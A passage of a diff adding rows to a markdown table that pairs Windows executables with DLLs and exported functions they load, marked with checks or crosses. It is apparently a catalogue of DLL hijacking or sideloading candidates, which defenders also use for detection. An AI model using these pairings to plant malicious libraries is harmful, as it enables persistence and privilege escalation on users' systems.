+| ✔️ | iscsicli.exe | ISCSIUM.dll | DllMain |
+| ✔️ | iscsicli.exe | WMICLNT.dll | DllMain |
+| ✔️ | mdsched.exe | bcd.dll | DllMain |
+| ✔️ | mschedexe.exe | MaintenanceUI.dll | DllMain |
+| ✔️ | msconfig.exe | ATL.DLL | AtlModuleInit |
+| ✔️ | msconfig.exe | ATL.DLL | AtlModuleRegisterClassObjects |
+| ✔️ | msconfig.exe | ATL.DLL | DllMain |
+| ✔️ | msconfig.exe | bcd.dll | DllMain |
+| ✔️ | msdt.exe | ATL.DLL | DllMain |
+| ✔️ | msdt.exe | Cabinet.dll | DllMain |
+| ✔️ | msdt.exe | SSPICLI.DLL | DllMain |
+| ✔️ | msdt.exe | UxTheme.dll | DllMain |
+| ✔️ | msdt.exe | wer.dll | DllMain |
+| ✔️ | msdt.exe | WINHTTP.dll | DllMain |
+| ✔️ | multidigimon.exe | NInput.dll | DllMain |
+| ✔️ | netplwiz.exe | CRYPTBASE.dll | DllMain |
+| ✔️ | netplwiz.exe | DSROLE.dll | DllMain |
+| ✔️ | netplwiz.exe | DSROLE.dll | DsRoleGetPrimaryDomainInformation |
+| ✔️ | netplwiz.exe | NETPLWIZ.dll | DllMain |
+| ✔️ | netplwiz.exe | NETPLWIZ.dll | UsersRunDllW |
+| ✔️ | netplwiz.exe | netutils.dll | DllMain |
+| ✔️ | netplwiz.exe | netutils.dll | NetApiBufferFree |
+| ✔️ | netplwiz.exe | PROPSYS.dll | DllMain |
+| ✔️ | netplwiz.exe | samcli.dll | DllMain |
+| ✔️ | netplwiz.exe | samcli.dll | NetUserGetInfo |
+| ✔️ | netplwiz.exe | SAMLIB.dll | DllMain |
+| ✔️ | netplwiz.exe | SAMLIB.dll | SamConnect |
+| ✔️ | netplwiz.exe | SAMLIB.dll | SamEnumerateDomainsInSamServer |
+| ✔️ | netplwiz.exe | SAMLIB.dll | SamFreeMemory |
+| ✔️ | optionalfeatures.exe | DUI70.dll | DllMain |
+| ✔️ | optionalfeatures.exe | DUI70.dll | InitProcessPriv |
+| ✔️ | optionalfeatures.exe | DUI70.dll | RegisterBaseControls |
+| ✔️ | optionalfeatures.exe | DUI70.dll | RegisterCommonControls |
+| ✔️ | optionalfeatures.exe | DUI70.dll | RegisterExtendedControls |
+| ✔️ | optionalfeatures.exe | DUI70.dll | RegisterStandardControls |
+| ✔️ | optionalfeatures.exe | msi.dll | DllMain |
+| ✔️ | optionalfeatures.exe | OLEACC.dll | CreateStdAccessibleObject |
+| ✔️ | optionalfeatures.exe | OLEACC.dll | DllMain |
+| ✔️ | optionalfeatures.exe | OLEACC.dll | GetRoleTextW |
+| ✔️ | optionalfeatures.exe | osbaseln.dll | CloseOsBaseline |
+| ✔️ | optionalfeatures.exe | osbaseln.dll | DllMain |
+| ✔️ | optionalfeatures.exe | osbaseln.dll | OpenOsBaseline |
+| ✔️ | optionalfeatures.exe | PROPSYS.dll | DllMain |
+| ✔️ | perfmon.exe | ATL.DLL | DllMain |
+| ✔️ | perfmon.exe | credui.dll | DllMain |
+| ✔️ | perfmon.exe | SspiCli.dll | DllMain |
+| ✔️ | printui.exe | IPHLPAPI.DLL | DllMain |
+| ✔️ | printui.exe | printui.dll | DllMain |
+| ✔️ | printui.exe | printui.dll | PrintUIEntryW |
+| ✔️ | printui.exe | PROPSYS.dll | DllMain |
+| ✔️ | printui.exe | puiapi.dll | DllMain |
+| ✔️ | recdisc.exe | bcd.dll | DllMain |
+| ✔️ | recdisc.exe | Cabinet.dll | DllMain |
+| ✔️ | recdisc.exe | ReAgent.dll | DllMain |
+| ✔️ | rstrui.exe | bcd.dll | DllMain |
+| ✔️ | rstrui.exe | ktmw32.dll | DllMain |
+| ✔️ | rstrui.exe | SPP.dll | DllMain |
+| ✔️ | rstrui.exe | SPP.dll | SxTracerGetThreadContextRetail |
+| ✔️ | rstrui.exe | SRCORE.dll | DllMain |
+| ✔️ | rstrui.exe | SRCORE.dll | SrFreeRestoreStatus |
+| ✔️ | rstrui.exe | VSSAPI.DLL | DllMain |
+| ✔️ | rstrui.exe | VssTrace.DLL | DllMain |
+| ✔️ | rstrui.exe | wer.dll | DllMain |
+| ✔️ | sdclt.exe | bcd.dll | DllMain |
+| ✔️ | sdclt.exe | Cabinet.dll | DllMain |
+| ✔️ | sdclt.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag |
+| ✔️ | sdclt.exe | CLDAPI.dll | DllMain |
+| ✔️ | sdclt.exe | CRYPTBASE.DLL | DllMain |
+| ✔️ | sdclt.exe | edputil.dll | DllMain |
+| ✔️ | sdclt.exe | edputil.dll | EdpGetIsManaged |
+| ✔️ | sdclt.exe | FLTLIB.DLL | DllMain |
+| ✔️ | sdclt.exe | PROPSYS.dll | DllMain |
+| ✔️ | sdclt.exe | PROPSYS.dll | PSCreateMemoryPropertyStore |
+| ✔️ | sdclt.exe | PROPSYS.dll | PSPropertyBag\_WriteDWORD |
+| ✔️ | sdclt.exe | ReAgent.dll | DllMain |
+| ✔️ | sdclt.exe | SPP.dll | DllMain |
+| ✔️ | sdclt.exe | SPP.dll | SxTracerGetThreadContextRetail |
+| ✔️ | sdclt.exe | SspiCli.dll | DllMain |
+| ✔️ | sdclt.exe | SspiCli.dll | GetUserNameExW |
+| ✔️ | sdclt.exe | UxTheme.dll | DllMain |
+| ✔️ | sdclt.exe | VSSAPI.DLL | DllMain |
+| ✔️ | sdclt.exe | VssTrace.DLL | DllMain |
+| ✔️ | sdclt.exe | wer.dll | DllMain |
+| ✔️ | sdclt.exe | WTSAPI32.dll | DllMain |
+| ✔️ | systempropertiesadvanced.exe | bcd.dll | DllMain |
+| ✔️ | systempropertiesadvanced.exe | credui.dll | DllMain |
+| ✔️ | systempropertiesadvanced.exe | DNSAPI.dll | DllMain |
+| ✔️ | systempropertiesadvanced.exe | DSROLE.DLL | DllMain |
+| ✔️ | systempropertiesadvanced.exe | DSROLE.DLL | DsRoleGetPrimaryDomainInformation |
+| ✔️ | systempropertiesadvanced.exe | LOGONCLI.DLL | DllMain |
+| ✔️ | systempropertiesadvanced.exe | netid.dll | CreateNetIDPropertyPage |
+| ✔️ | systempropertiesadvanced.exe | netid.dll | DllMain |
+| ✔️ | systempropertiesadvanced.exe | NETUTILS.DLL | DllMain |
+| ✔️ | systempropertiesadvanced.exe | SRVCLI.DLL | DllMain |
+| ✔️ | systempropertiesadvanced.exe | WINBRAND.dll | DllMain |
+| ✔️ | systempropertiesadvanced.exe | WINSTA.dll | DllMain |
+| ✔️ | systempropertiesadvanced.exe | WKSCLI.DLL | DllMain |
+| ✔️ | systempropertiescomputername.exe | bcd.dll | DllMain |
+| ✔️ | systempropertiescomputername.exe | WINSTA.dll | DllMain |
+| ✔️ | systempropertiesdataexecutionprevention.exe | bcd.dll | DllMain |
+| ✔️ | systempropertiesdataexecutionprevention.exe | WINSTA.dll | DllMain |
+| ✔️ | systempropertieshardware.exe | bcd.dll | DllMain |
+| ✔️ | systempropertieshardware.exe | WINSTA.dll | DllMain |
+| ✔️ | systempropertiesprotection.exe | bcd.dll | DllMain |
+| ✔️ | systempropertiesprotection.exe | WINSTA.dll | DllMain |
+| ✔️ | systempropertiesremote.exe | bcd.dll | DllMain |
+| ✔️ | systempropertiesremote.exe | WINSTA.dll | DllMain |
+| ✔️ | systemreset.exe | bcd.dll | BcdCloseObject |
+| ✔️ | systemreset.exe | bcd.dll | BcdCloseStore |
+| ✔️ | systemreset.exe | bcd.dll | BcdFlushStore |
+| ✔️ | systemreset.exe | bcd.dll | BcdGetElementData |
+| ✔️ | systemreset.exe | bcd.dll | BcdOpenObject |
+| ✔️ | systemreset.exe | bcd.dll | BcdOpenStore |
+| ✔️ | systemreset.exe | bcd.dll | DllMain |
+| ✔️ | systemreset.exe | Cabinet.dll | DllMain |
+| ✔️ | systemreset.exe | d3d10warp.dll | DllMain |
+| ✔️ | systemreset.exe | d3d10warp.dll | OpenAdapter10\_2 |
+| ✔️ | systemreset.exe | d3d11.dll | D3D11CreateDevice |
+| ✔️ | systemreset.exe | d3d11.dll | DllMain |
+| ✔️ | systemreset.exe | dbgcore.DLL | DllMain |
+| ✔️ | systemreset.exe | DismApi.DLL | DllMain |
+| ✔️ | systemreset.exe | dxgi.dll | CreateDXGIFactory1 |
+| ✔️ | systemreset.exe | dxgi.dll | DllMain |
+| ✔️ | systemreset.exe | FVEAPI.dll | DllMain |
+| ✔️ | systemreset.exe | FVEAPI.dll | FveGetStatus |
+| ✔️ | systemreset.exe | FVEAPI.dll | FveOpenVolumeW |
+| ✔️ | systemreset.exe | ReAgent.dll | DllMain |
+| ✔️ | systemreset.exe | ReAgent.dll | WinReGetConfig |
+| ✔️ | systemreset.exe | ResetEngine.dll | DllMain |
+| ✔️ | systemreset.exe | ResetEngine.dll | ResetCreateSession |
+| ✔️ | systemreset.exe | ResetEngine.dll | ResetReleaseSession |
+| ✔️ | systemreset.exe | ResetEngine.dll | ResetTraceClientInfo |
+| ✔️ | systemreset.exe | ResetEngine.dll | ResetValidateScenario |
+| ✔️ | systemreset.exe | tbs.dll | DllMain |
+| ✔️ | systemreset.exe | VSSAPI.DLL | DllMain |
+| ✔️ | systemreset.exe | VssTrace.DLL | DllMain |
+| ✔️ | systemreset.exe | WDSCORE.dll | ConstructPartialMsgVW |
+| ✔️ | systemreset.exe | WDSCORE.dll | CurrentIP |
+| ✔️ | systemreset.exe | WDSCORE.dll | DllMain |
+| ✔️ | systemreset.exe | WDSCORE.dll | WdsInitialize |
+| ✔️ | systemreset.exe | WDSCORE.dll | WdsSetupLogMessageW |
+| ✔️ | systemreset.exe | WIMGAPI.DLL | DllMain |
+| ✔️ | systemreset.exe | WIMGAPI.DLL | WIMCreateFile |
+| ✔️ | systemreset.exe | WINHTTP.dll | DllMain |
+| ✔️ | systemreset.exe | WOFUTIL.dll | DllMain |
+| ✔️ | systemreset.exe | XmlLite.dll | DllMain |
+| ✔️ | systemsettingsadminflows.exe | AppXDeploymentClient.dll | DllMain |
+| ✔️ | systemsettingsadminflows.exe | Bcp47Langs.dll | DllMain |
+| ✔️ | systemsettingsadminflows.exe | DEVRTL.dll | DllMain |
+| ✔️ | systemsettingsadminflows.exe | DismApi.DLL | DllMain |
+| ✔️ | systemsettingsadminflows.exe | DNSAPI.dll | DllMain |
+| ✔️ | systemsettingsadminflows.exe | FirewallAPI.dll | DllMain |
+| ✔️ | systemsettingsadminflows.exe | fwbase.dll | DllMain |
+| ✔️ | systemsettingsadminflows.exe | fwbase.dll | FwCriticalSectionCreate |
+| ✔️ | systemsettingsadminflows.exe | fwbase.dll | FwCriticalSectionDestroy |
+| ✔️ | systemsettingsadminflows.exe | logoncli.dll | DllMain |
+| ✔️ | systemsettingsadminflows.exe | netutils.dll | DllMain |
+| ✔️ | systemsettingsadminflows.exe | newdev.dll | DllMain |
+| ✔️ | systemsettingsadminflows.exe | PROPSYS.dll | DllMain |
+| ✔️ | systemsettingsadminflows.exe | samcli.dll | DllMain |
+| ✔️ | systemsettingsadminflows.exe | SspiCli.dll | DllMain |
+| ✔️ | systemsettingsadminflows.exe | StateRepository.Core.dll | DllMain |
+| ✔️ | systemsettingsadminflows.exe | SystemSettingsThresholdAdminFlowUI.dll | DllMain |
+| ✔️ | systemsettingsadminflows.exe | timesync.dll | DllMain |
+| ✔️ | systemsettingsadminflows.exe | USERENV.dll | DllMain |
+| ✔️ | systemsettingsadminflows.exe | WINBRAND.dll | DllMain |
+| ✔️ | systemsettingsadminflows.exe | wkscli.dll | DllMain |
+| ✔️ | systemsettingsadminflows.exe | Wldp.dll | DllMain |
+| ✔️ | systemsettingsadminflows.exe | WTSAPI32.dll | DllMain |
+| ✔️ | taskmgr.exe | credui.dll | DllMain |
+| ✔️ | taskmgr.exe | d3d11.dll | DllMain |
+| ✔️ | taskmgr.exe | d3d12.dll | DllMain |
+| ✔️ | taskmgr.exe | dxgi.dll | DllMain |
+| ✔️ | taskmgr.exe | pdh.dll | DllMain |
+| ✔️ | taskmgr.exe | UxTheme.dll | DllMain |
+| ✔️ | tcmsetup.exe | TAPI32.dll | DllMain |
+| ✔️ | winsat.exe | d3d10\_1.dll | DllMain |
+| ✔️ | winsat.exe | d3d10\_1core.dll | DllMain |
+| ✔️ | winsat.exe | d3d10.dll | DllMain |
+| ✔️ | winsat.exe | d3d10core.dll | DllMain |
+| ✔️ | winsat.exe | d3d11.dll | DllMain |
+| ✔️ | winsat.exe | dxgi.dll | DllMain |
+| ✔️ | winsat.exe | winmm.dll | DllMain |
+| ✔️ | wsreset.exe | licensemanagerapi.dll | DllMain |
+| ✔️ | wsreset.exe | licensemanagerapi.dll | Reset |
+| ✔️ | wsreset.exe | wevtapi.dll | DllMain |
+| ✔️ | wusa.exe | dpx.dll | DllMain |
+| ✔️ | wusa.exe | WTSAPI32.dll | DllMain |
+| ❌ | agentservice.exe | ACTIVEDS.dll | DllMain |
+| ❌ | agentservice.exe | adsldpc.dll | DllMain |
+| ❌ | agentservice.exe | FLTLIB.DLL | DllMain |
+| ❌ | applytrustoffline.exe | mintdh.dll | DllMain |
+| ❌ | applytrustoffline.exe | mintdh.dll | TdhpSetWbemExtensionBlock |
+| ❌ | applytrustoffline.exe | StateRepository.Core.dll | DllMain |
+| ❌ | arp.exe | IPHLPAPI.DLL | DllMain |
+| ❌ | arp.exe | snmpapi.dll | DllMain |
+| ❌ | at.exe | cryptdll.dll | DllMain |
+| ❌ | at.exe | netutils.dll | DllMain |
+| ❌ | at.exe | NtlmShared.dll | DllMain |
+| ❌ | at.exe | schedcli.dll | DllMain |
+| ❌ | at.exe | schedcli.dll | NetScheduleJobEnum |
+| ❌ | at.exe | sspicli.dll | DllMain |
+| ❌ | at.exe | sspicli.dll | InitSecurityInterfaceW |
+| ❌ | auditpol.exe | auditpolcore.dll | AdtEnableSinglePrivilege |
+| ❌ | auditpol.exe | auditpolcore.dll | AuditPolicyData\_DeleteAuditDataInstance |
+| ❌ | auditpol.exe | auditpolcore.dll | DllMain |
+| ❌ | auditpol.exe | auditpolcore.dll | LoadFormatStringAndPrintToConsole |
+| ❌ | baaupdate.exe | FVEAPI.dll | DllMain |
+| ❌ | bdechangepin.exe | FVEAPI.dll | DllMain |
+| ❌ | bdechangepin.exe | FVEAPI.dll | FveGetAuthMethodInformation |
+| ❌ | bdechangepin.exe | FVEAPI.dll | FveGetStatus |
+| ❌ | bdechangepin.exe | FVEAPI.dll | FveOpenVolumeW |
+| ❌ | bdeuisrv.exe | USERENV.dll | DllMain |
+| ❌ | bdeuisrv.exe | WTSAPI32.dll | DllMain |
+| ❌ | bioiso.exe | iumbase.DLL | DllMain |
+| ❌ | bootim.exe | bcd.dll | BcdGetElementData |
+| ❌ | bootim.exe | bcd.dll | BcdOpenObject |
+| ❌ | bootim.exe | bcd.dll | BcdOpenSystemStore |
+| ❌ | bootim.exe | bcd.dll | BcdQueryObject |
+| ❌ | bootim.exe | bcd.dll | DllMain |
+| ❌ | bootim.exe | BootMenuUX.DLL | CreateBareMetalRecoveryButton |
+| ❌ | bootim.exe | BootMenuUX.DLL | CreateBootableOSButtonCollection |
+| ❌ | bootim.exe | BootMenuUX.DLL | CreateCloudRecoveryButton |
+| ❌ | bootim.exe | BootMenuUX.DLL | CreateDefaultOSButton |
+| ❌ | bootim.exe | BootMenuUX.DLL | CreateDeviceListButton |
+| ❌ | bootim.exe | BootMenuUX.DLL | CreateDirectFactoryResetButton |
+| ❌ | bootim.exe | BootMenuUX.DLL | CreateOSListButton |
+| ❌ | bootim.exe | BootMenuUX.DLL | CreateRecoveryToolsListButton |
+| ❌ | bootim.exe | BootMenuUX.DLL | CreateSelectOSPage |
+| ❌ | bootim.exe | BootMenuUX.DLL | CreateShutdownButton |
+| ❌ | bootim.exe | BootMenuUX.DLL | DllMain |
+| ❌ | bootim.exe | Cabinet.dll | DllMain |
+| ❌ | bootim.exe | dbghelp.dll | DllMain |
+| ❌ | bootim.exe | DismApi.DLL | DllMain |
+| ❌ | bootim.exe | FLTLIB.DLL | DllMain |
+| ❌ | bootim.exe | OLEACC.dll | DllMain |
+| ❌ | bootim.exe | OLEACC.dll | GetRoleTextW |
+| ❌ | bootim.exe | PROPSYS.dll | DllMain |
+| ❌ | bootim.exe | PROPSYS.dll | PSCreateMemoryPropertyStore |
+| ❌ | bootim.exe | ReAgent.dll | DllMain |
+| ❌ | bootim.exe | ReAgent.dll | WinReGetConfig |
+| ❌ | bootim.exe | ResetEng.dll | DllMain |
+| ❌ | bootim.exe | tbs.dll | DllMain |
+| ❌ | bootim.exe | VirtDisk.dll | DllMain |
+| ❌ | bootim.exe | VSSAPI.DLL | DllMain |
+| ❌ | bootim.exe | VssTrace.DLL | DllMain |
+| ❌ | bootim.exe | WDSCORE.dll | ConstructPartialMsgVW |
+| ❌ | bootim.exe | WDSCORE.dll | CurrentIP |
+| ❌ | bootim.exe | WDSCORE.dll | DllMain |
+| ❌ | bootim.exe | WDSCORE.dll | WdsSetupLogMessageW |
+| ❌ | calc.exe | CRYPTBASE.DLL | DllMain |
+| ❌ | calc.exe | edputil.dll | DllMain |
+| ❌ | calc.exe | edputil.dll | EdpGetIsManaged |
+| ❌ | calc.exe | MLANG.dll | ConvertINetUnicodeToMultiByte |
+| ❌ | calc.exe | MLANG.dll | DllMain |
+| ❌ | calc.exe | PROPSYS.dll | DllMain |
+| ❌ | calc.exe | PROPSYS.dll | PSCreateMemoryPropertyStore |
+| ❌ | calc.exe | PROPSYS.dll | PSPropertyBag\_WriteDWORD |
+| ❌ | calc.exe | Secur32.dll | DllMain |
+| ❌ | calc.exe | SSPICLI.DLL | DllMain |
+| ❌ | calc.exe | SSPICLI.DLL | GetUserNameExW |
+| ❌ | calc.exe | WININET.dll | DllMain |
+| ❌ | calc.exe | WININET.dll | GetUrlCacheEntryBinaryBlob |
+| ❌ | certreq.exe | cscapi.dll | CscNetApiGetInterface |
+| ❌ | certreq.exe | cscapi.dll | DllMain |
+| ❌ | certreq.exe | DUI70.dll | DllMain |
+| ❌ | certreq.exe | DUI70.dll | FlushThemeHandles |
+| ❌ | certreq.exe | DUI70.dll | InitProcessPriv |
+| ❌ | certreq.exe | DUI70.dll | InitThread |
+| ❌ | certreq.exe | dwmapi.dll | DllMain |
+| ❌ | certreq.exe | dwmapi.dll | DwmSetWindowAttribute |
+| ❌ | certreq.exe | LINKINFO.dll | DllMain |
+| ❌ | certreq.exe | LINKINFO.dll | IsValidLinkInfo |
+| ❌ | certreq.exe | SSPICLI.DLL | DllMain |
+| ❌ | certreq.exe | WindowsCodecs.dll | DllMain |
+| ❌ | certreq.exe | WindowsCodecs.dll | WICCreateImagingFactory\_Proxy |
+| ❌ | certreq.exe | WININET.dll | DllMain |
+| ❌ | certreq.exe | XmlLite.dll | CreateXmlReader |
+| ❌ | certreq.exe | XmlLite.dll | CreateXmlReaderInputWithEncodingName |
+| ❌ | certreq.exe | XmlLite.dll | DllMain |
+| ❌ | certutil.exe | Cabinet.dll | DllMain |
+| ❌ | certutil.exe | CRYPTUI.dll | DllMain |
+| ❌ | certutil.exe | DSROLE.DLL | DllMain |
+| ❌ | certutil.exe | LOGONCLI.DLL | DllMain |
+| ❌ | certutil.exe | NETUTILS.DLL | DllMain |
+| ❌ | certutil.exe | NTDSAPI.dll | DllMain |
+| 
❌ | certutil.exe | SAMCLI.DLL | DllMain | +| ❌ | certutil.exe | SSPICLI.DLL | DllMain | +| ❌ | change.exe | logoncli.dll | DllMain | +| ❌ | change.exe | netutils.dll | DllMain | +| ❌ | change.exe | samcli.dll | DllMain | +| ❌ | change.exe | srvcli.dll | DllMain | +| ❌ | change.exe | utildll.dll | DllMain | +| ❌ | change.exe | WINSTA.dll | DllMain | +| ❌ | charmap.exe | GetUName.dll | DllMain | +| ❌ | charmap.exe | MSFTEDIT.DLL | DllMain | +| ❌ | checknetisolation.exe | DNSAPI.dll | DllMain | +| ❌ | checknetisolation.exe | FirewallAPI.dll | DllMain | +| ❌ | checknetisolation.exe | fwbase.dll | DllMain | +| ❌ | checknetisolation.exe | fwbase.dll | FwAlloc | +| ❌ | checknetisolation.exe | fwbase.dll | FwCriticalSectionCreate | +| ❌ | checknetisolation.exe | fwbase.dll | FwCriticalSectionDestroy | +| ❌ | checknetisolation.exe | fwbase.dll | FwFree | +| ❌ | checknetisolation.exe | fwpuclnt.dll | DllMain | +| ❌ | chglogon.exe | logoncli.dll | DllMain | +| ❌ | chglogon.exe | netutils.dll | DllMain | +| ❌ | chglogon.exe | REGAPI.dll | DllMain | +| ❌ | chglogon.exe | samcli.dll | DllMain | +| ❌ | chglogon.exe | srvcli.dll | DllMain | +| ❌ | chglogon.exe | utildll.dll | DllMain | +| ❌ | chglogon.exe | WINSTA.dll | DllMain | +| ❌ | chgport.exe | logoncli.dll | DllMain | +| ❌ | chgport.exe | netutils.dll | DllMain | +| ❌ | chgport.exe | samcli.dll | DllMain | +| ❌ | chgport.exe | srvcli.dll | DllMain | +| ❌ | chgport.exe | utildll.dll | DllMain | +| ❌ | chgport.exe | WINSTA.dll | DllMain | +| ❌ | chkdsk.exe | DEVOBJ.dll | DllMain | +| ❌ | chkntfs.exe | DEVOBJ.dll | DllMain | +| ❌ | cipher.exe | DSROLE.dll | DllMain | +| ❌ | cipher.exe | EFSUTIL.dll | DllMain | +| ❌ | cipher.exe | FeClient.dll | DllMain | +| ❌ | cipher.exe | iertutil.dll | DllMain | +| ❌ | cipher.exe | NTDSAPI.dll | DllMain | +| ❌ | cipher.exe | VAULTCLI.dll | DllMain | +| ❌ | clipup.exe | CRYPTXML.dll | DllMain | +| ❌ | clipup.exe | webservices.dll | DllMain | +| ❌ | cmdl32.exe | Cabinet.dll | DllMain | +| ❌ | 
cmdl32.exe | cmpbk32.dll | DllMain | +| ❌ | cmdl32.exe | RASAPI32.dll | DllMain | +| ❌ | cmdl32.exe | rasman.dll | DllMain | +| ❌ | cmdl32.exe | WINHTTP.dll | DllMain | +| ❌ | colorcpl.exe | ColorAdapterClient.dll | DllMain | +| ❌ | colorcpl.exe | colorui.dll | DllMain | +| ❌ | colorcpl.exe | colorui.dll | LaunchColorCpl | +| ❌ | colorcpl.exe | IPHLPAPI.DLL | DllMain | +| ❌ | colorcpl.exe | mscms.dll | ColorCplInitialize | +| ❌ | colorcpl.exe | mscms.dll | ColorCplUninitialize | +| ❌ | colorcpl.exe | mscms.dll | DllMain | +| ❌ | colorcpl.exe | PROPSYS.dll | DllMain | +| ❌ | colorcpl.exe | USERENV.dll | DllMain | +| ❌ | compmgmtlauncher.exe | apphelp.dll | ApphelpCheckShellObject | +| ❌ | compmgmtlauncher.exe | apphelp.dll | DllMain | +| ❌ | compmgmtlauncher.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag | +| ❌ | compmgmtlauncher.exe | CLDAPI.dll | DllMain | +| ❌ | compmgmtlauncher.exe | CRYPTBASE.dll | DllMain | +| ❌ | compmgmtlauncher.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | compmgmtlauncher.exe | edputil.dll | DllMain | +| ❌ | compmgmtlauncher.exe | edputil.dll | EdpGetIsManaged | +| ❌ | compmgmtlauncher.exe | FLTLIB.DLL | DllMain | +| ❌ | compmgmtlauncher.exe | PROPSYS.dll | DllMain | +| ❌ | compmgmtlauncher.exe | PROPSYS.dll | PSCreateMemoryPropertyStore | +| ❌ | compmgmtlauncher.exe | PROPSYS.dll | PSPropertyBag\_WriteDWORD | +| ❌ | ctfmon.exe | MsCtfMonitor.DLL | DllMain | +| ❌ | ctfmon.exe | MsCtfMonitor.DLL | DoMsCtfMonitor | +| ❌ | ctfmon.exe | MSUTB.dll | DllMain | +| ❌ | ctfmon.exe | WINSTA.dll | DllMain | +| ❌ | cttune.exe | DWrite.dll | DllMain | +| ❌ | cttune.exe | DWrite.dll | DWriteCreateFactory | +| ❌ | cttune.exe | OLEACC.dll | DllMain | +| ❌ | cttune.exe | UxTheme.dll | DllMain | +| ❌ | dataexchangehost.exe | d2d1.dll | DllMain | +| ❌ | dataexchangehost.exe | d3d11.dll | DllMain | +| ❌ | dataexchangehost.exe | DWrite.dll | DllMain | +| ❌ | dataexchangehost.exe | dxgi.dll | DllMain | +| ❌ | datausagelivetiletask.exe | dusmapi.dll 
| DllMain | +| ❌ | datausagelivetiletask.exe | IPHLPAPI.DLL | DllMain | +| ❌ | ddodiag.exe | XmlLite.dll | CreateXmlReader | +| ❌ | ddodiag.exe | XmlLite.dll | DllMain | +| ❌ | deploymentcsphelper.exe | dbgcore.DLL | DllMain | +| ❌ | deploymentcsphelper.exe | DismApi.DLL | DllMain | +| ❌ | deploymentcsphelper.exe | WDSCORE.dll | ConstructPartialMsgVW | +| ❌ | deploymentcsphelper.exe | WDSCORE.dll | CurrentIP | +| ❌ | deploymentcsphelper.exe | WDSCORE.dll | DllMain | +| ❌ | deploymentcsphelper.exe | WDSCORE.dll | WdsInitialize | +| ❌ | deploymentcsphelper.exe | WDSCORE.dll | WdsSetupLogMessageW | +| ❌ | deploymentcsphelper.exe | WDSCORE.dll | WdsTerminate | +| ❌ | devicecensus.exe | dcntel.dll | DllMain | +| ❌ | devicecensus.exe | dcntel.dll | GetCensusRegistryLocation | +| ❌ | devicecensus.exe | dcntel.dll | RunSystemContextCensus | +| ❌ | devicecensus.exe | dcntel.dll | SetCustomTrigger | +| ❌ | devicecensus.exe | dcntel.dll | SetCustomTriggerEx | +| ❌ | devicecensus.exe | IPHLPAPI.DLL | DllMain | +| ❌ | devicecensus.exe | IPHLPAPI.DLL | GetAdaptersInfo | +| ❌ | devicecensus.exe | logoncli.dll | DllMain | +| ❌ | devicecensus.exe | logoncli.dll | DsGetDcNameW | +| ❌ | devicecensus.exe | netutils.dll | DllMain | +| ❌ | devicecensus.exe | netutils.dll | NetApiBufferAllocate | +| ❌ | devicecensus.exe | WINHTTP.dll | DllMain | +| ❌ | devicecredentialdeployment.exe | DeviceCredential.dll | DllMain | +| ❌ | deviceenroller.exe | DEVOBJ.dll | DllMain | +| ❌ | deviceenroller.exe | DMCmnUtils.dll | CopyString | +| ❌ | deviceenroller.exe | DMCmnUtils.dll | DllMain | +| ❌ | deviceenroller.exe | dmEnrollEngine.DLL | DllMain | +| ❌ | deviceenroller.exe | dmenterprisediagnostics.dll | DllMain | +| ❌ | deviceenroller.exe | iri.dll | DllMain | +| ❌ | deviceenroller.exe | netutils.dll | DllMain | +| ❌ | deviceenroller.exe | omadmapi.dll | DllMain | +| ❌ | deviceenroller.exe | omadmapi.dll | FreeCommandLineOptions | +| ❌ | deviceenroller.exe | omadmapi.dll | ProcessCommandLine | +| ❌ 
| deviceenroller.exe | samcli.dll | DllMain | +| ❌ | deviceenroller.exe | USERENV.dll | DllMain | +| ❌ | deviceenroller.exe | XmlLite.dll | DllMain | +| ❌ | devicepairingwizard.exe | dwmapi.dll | DllMain | +| ❌ | devicepairingwizard.exe | dwmapi.dll | DwmExtendFrameIntoClientArea | +| ❌ | devicepairingwizard.exe | OLEACC.dll | DllMain | +| ❌ | devicepairingwizard.exe | OLEACC.dll | GetRoleTextW | +| ❌ | dfrgui.exe | SXSHARED.dll | DllMain | +| ❌ | dfrgui.exe | SXSHARED.dll | SxTracerGetThreadContextRetail | +| ❌ | dialer.exe | rtutils.dll | DllMain | +| ❌ | dialer.exe | rtutils.dll | TraceRegisterExW | +| ❌ | dialer.exe | rtutils.dll | TraceVprintfExA | +| ❌ | dialer.exe | SspiCli.dll | DllMain | +| ❌ | dialer.exe | SspiCli.dll | GetUserNameExW | +| ❌ | dialer.exe | TAPI32.dll | DllMain | +| ❌ | dialer.exe | TAPI32.dll | lineInitializeExW | +| ❌ | disksnapshot.exe | CRYPTBASE.dll | DllMain | +| ❌ | disksnapshot.exe | CRYPTBASE.dll | SystemFunction036 | +| ❌ | dispdiag.exe | DEVOBJ.dll | DevObjCreateDeviceInfoList | +| ❌ | dispdiag.exe | DEVOBJ.dll | DevObjDestroyDeviceInfoList | +| ❌ | dispdiag.exe | DEVOBJ.dll | DevObjGetClassDevs | +| ❌ | dispdiag.exe | DEVOBJ.dll | DllMain | +| ❌ | dispdiag.exe | DXVA2.dll | DllMain | +| ❌ | dispdiag.exe | DXVA2.dll | GetNumberOfPhysicalMonitorsFromHMONITOR | +| ❌ | dispdiag.exe | WMICLNT.dll | DllMain | +| ❌ | dispdiag.exe | WMICLNT.dll | WmiDevInstToInstanceNameW | +| ❌ | dispdiag.exe | WMICLNT.dll | WmiOpenBlock | +| ❌ | displayswitch.exe | dwmapi.dll | DllMain | +| ❌ | displayswitch.exe | policymanager.dll | DllMain | +| ❌ | displayswitch.exe | policymanager.dll | PolicyManager\_GetPolicyInt | +| ❌ | displayswitch.exe | UxTheme.dll | DllMain | +| ❌ | displayswitch.exe | WINSTA.dll | DllMain | +| ❌ | djoin.exe | dbgcore.DLL | DllMain | +| ❌ | djoin.exe | JOINUTIL.DLL | DllMain | +| ❌ | djoin.exe | logoncli.dll | DllMain | +| ❌ | djoin.exe | netutils.dll | DllMain | +| ❌ | djoin.exe | netutils.dll | NetApiBufferFree | +| ❌ | 
